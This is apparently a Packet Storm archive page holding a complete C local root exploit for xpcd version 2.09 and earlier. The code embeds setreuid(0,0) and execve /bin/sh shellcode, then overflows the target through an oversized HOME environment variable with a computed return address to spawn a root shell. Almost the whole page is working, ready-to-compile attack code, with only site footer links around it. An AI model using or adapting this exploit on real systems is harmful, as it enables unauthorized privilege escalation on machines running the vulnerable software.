xpcd local root exploit for versions 2.09 and belo.
6beff4230abf9da27154ff90780cf32fc8664f49efd3b00063b8d4ef458e4b7a/*
xpcd <= 2.09 local r00t exploit
02.02.05
(c)oded by Darkeagle
*/
#include <stdio.h>
#include <string.h>
char
shellcode[]=
// setreuid(0,0); Coded by ChoiX [unl0ck team]
"\x31\xc0" // xor %eax,%eax
"\x31\xdb" // xor %ebx,%ebx
"\x31\xc9" // xor %ecx,%ecx
"\xb0\x46" // mov $0x46,%al
"\xcd\x80" // int $0x80
// execve /bin/sh
"\x31\xc0" // xor %eax,%eax
"\x50" // push %eax
"\x68\x2f\x2f\x73\x68" // push $0x68732f2f
"\x68\x2f\x62\x69\x6e" // push $0x6e69622f
"\x89\xe3" // mov %esp,%ebx
"\x8d\x54\x24\x08" // lea 0x8(%esp,1),%edx
"\x50" // push %eax
"\x53" // push %ebx
"\x8d\x0c\x24" // lea (%esp,1),%ecx
"\xb0\x0b" // mov $0xb,%al
"\xcd\x80" // int $0x80
// exit();
"\x31\xc0" // xor %eax,%eax
"\xb0\x01" // mov $0x1,%al
"\xcd\x80"; // int $0x80
int main(int argc, char *argv[])
{
char buf[1024];
long RET = 0x41424344;
char *path;
printf("\nxpcd local root exploit\n\n\n");
if ( argc < 2 )
{
printf("usage: %s <path>\n", argv[0]);
exit(0);
}
path = argv[1];
RET = 0xbffffffa - strlen(shellcode) - strlen(path);
memset(buf, 'A', 284);
*(long*)&buf[284] = RET;
setenv("HOME", buf, 1);
setenv("SHELLCODE", shellcode, 1);
execl(path, path, NULL);
return 0;
}
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed